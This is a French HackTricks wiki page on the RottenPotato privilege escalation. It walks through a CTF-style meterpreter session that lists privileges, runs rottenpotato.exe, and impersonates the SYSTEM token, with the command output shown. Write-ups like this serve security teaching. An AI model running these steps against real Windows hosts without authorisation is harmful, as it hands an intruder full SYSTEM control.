hacktricks/windows-hardening/windows-local-privilege-escalation/rottenpotato.md

5 KiB

RottenPotato

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Les informations de cette page ont été extraites de cet article

Les comptes de service ont généralement des privilèges spéciaux (SeImpersonatePrivileges) et cela pourrait être utilisé pour élever les privilèges.

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

Je ne vais pas entrer dans les détails de comment fonctionne cette exploitation, l'article ci-dessus l'explique bien mieux que je ne pourrais jamais le faire.

Vérifions nos privilèges avec meterpreter :

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

Excellente, il semble que nous ayons les privilèges nécessaires pour réaliser l'attaque. Chargeons rottenpotato.exe

De retour sur notre session meterpreter, nous chargeons l'extension incognito.

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available

Nous pouvons constater que nous n'avons actuellement aucun jeton d'usurpation (Impersonation Tokens). Exécutons l'exploit Rotten Potato.

meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

Nous devons rapidement usurper le jeton ou il disparaîtra.

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Succès ! Nous avons notre shell SYSTEM et pouvons récupérer le fichier root.txt !

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :